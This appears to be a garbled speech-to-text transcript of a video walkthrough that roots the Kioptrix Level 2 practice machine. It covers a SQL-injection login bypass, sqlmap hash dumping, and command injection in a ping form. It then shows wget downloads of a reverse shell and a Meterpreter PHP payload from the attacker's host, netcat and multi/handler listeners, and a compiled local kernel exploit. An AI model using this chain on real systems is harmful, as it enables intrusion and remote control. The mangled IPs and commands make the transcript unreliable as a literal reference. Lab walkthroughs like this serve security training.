Hi everyone, this is Angel from PLC Hack, and today I will explain how to crack the kioptrix level 2. So we can start with nmap. This is the IP address of my kioptrix, so you just have to replace with yours. And let's see. Okay, so we have SSH, Apache, RPC, cups, MySQL. I know for a fact that there is a remote root exploit for this cups 1.1, but that will be too easy, so let's try something else first. Okay, so if we go to the web page 172.16.1.189, sorry, 189, is asking me for a username and password. Okay, so if I try admin something, it's not working. Okay, but we can try a SQL injection, or you can try Hydra to brute force the username and password. In this occasion we will be using a SQL injection. So this is what I'm going to be typing on the password. Okay, so admin, paste, and surely enough that worked. So now we are on this welcome to the basic administrative web console, ping a machine on a network. So yeah, let's try to do that. Let's ping localhost. Okay, so that works. In order for the developer to be able to do this, he must be using one of those system call functions like exec, system, eval, pass-through, one of those. So that means that if he didn't properly sanitize the function, we might be able to run something else as well, like this. Yes, that works. Okay, so at this point we can upload our shell to the server, or because there is a SQL injection, we can play around with SQL map. So if you go and test database SQL map, okay, and then if you do SQL map minus u into 16.1.1.89, oops, 9, minus data, uname. I will get to that in a second. Y uname and y psw. More 1 equals 1. That's our SQL injection. And then the command. Okay, so why uname and psw? If we go back to that admin web page, and if we look on the source code, the field username is uname and the field password is psw, so that's why uname and psw. Okay, so let's see what happens. Okay, hold on a second because I forgot to put this. Hold on a second. Management data. And this is going to go. Yes. Okay, so he returned test. Those are available. So if you want to check the current DB, that's web app. Okay, if you want to check for the passwords for MySQL, let's see what we get. Okay, so we got the hashes for root and John. Okay, so what that means is if we connect, we can connect to that MySQL remotely and have a shell to the server. Okay, or you can use the shell from SQL Map. That works as well. Select star from users. There you go. We have admin and John. Okay, so let's quit that. Okay, so now we have to upload our shell. So we have two options. You can upload yours, or you can use Metasploit to upload your shell. So first I will explain how I do it with mine. So let's download that. It's wget -o tmp, let's say just shell http 261.29 exploits reverse shell. Then we need to give permission 777 tmp shell, and let's just make sure that's everything according to the plan. Okay, I need to do that ls on tmp. tmp. Just make sure that the shell is there with access. Okay, it's there. So now if we execute that tmp shell, but before we do that we need to prepare the server. So netcat -l for listening -p 10,000. That's where my shell will connect back. So let's try that, and we should get our shell here. Yeah, okay. So that's how I upload my shell. If I just go tmp cat shell, that's my reverse shell. Okay. Okay, so now we have the shell on the server with my technique. So now let's cancel that, and let's try to do that using Metasploit. I'll start this here on this shell, and this one let's try to create our reverse shell using Metasploit. Okay, so msf console php meterpreter reverse ccp lhost equals 172.16.179. This is our backtrack host. L port equals 8080. That's the port that it will be listening to. And let's write backdoor.php.txt. Okay, and after this finished, we need to edit this file, because I think Metasploit is just trying to avoid script kiddies to use this, so we need to remove a hash on the beginning of the file, or otherwise it's not going to work. and we need to double check everything on the vector anyway. So this is normal. It usually takes a while to do it. Come on. I thought for a moment that I lost my connection, because this is taking longer than the usual. I'm gonna pause this video until it's finished. Sorry guys, I just realized now that I typed that wrong. Instead, MSF console is MSF payload. So we need to remove that. And MSF payload. Okay. It's too early. I'm still waking up. Okay. So let's just check that vector. We need to remove this, and IP looks okay, port looks okay, alright, so everything looks okay. So now we need to add that with MSF console and set up our handler. So use multi handler set payload HP method verse host 00 to listen to that and that IP. Port, if you guys remember, we set up 8080 for exploit -J -Z. Okay, so now it's waiting for the connection, so now we need to download our shell. So again, wget -o .mp backdoor.php http ://6179 backdoor.php.txt, and then we need to run it. php -f backdoor.php. hopefully no input file specified. Okay, hold on a second, I forgot to put TMP here. So just need to delete this. TMP. Okay. And hopefully we should get our shell here. And yes, that works. So if we do sessions minus I 1, and there you go. This is info shell. Okay. And that's it. Okay. So your name is A. Alright, so we need to find an exploit for this kernel. So if we go back to our other shell, and you can either Google it or we can search local. So you can test exploit db search exploit. Okay, then we put kernel Linux local. Okay, there is lots of exploits here, so we need to find something that is 2.x or 2.6.x or one of those that is like a lower version. So what we got here, 2, 4, this one, 2, 4, 2, 6. That might be a good one, or yeah, we can try this 2x, 2.x. Okay, so let's see what's inside there. Test exploits, exploit db platform. Okay, if you can download this exploit. Oh, there is even on YouTube explaining the exploit. Or you can Google it. If you Google it, you will end up with other options like this one, or this one, okay. So if you just download this exploit, I have it here, okay. Exploits IP, that's the one that I have, okay. This one is this one, okay. So you need to download to here. So wget 172.61.79.x exploits p append data.c. Okay, and we compile it. Root IP append data.c and ID get root, and we are root. So that's it, guys. What we got here? Yeah, okay, anyway, so we got through to the box, and that's it. If you guys have any questions, please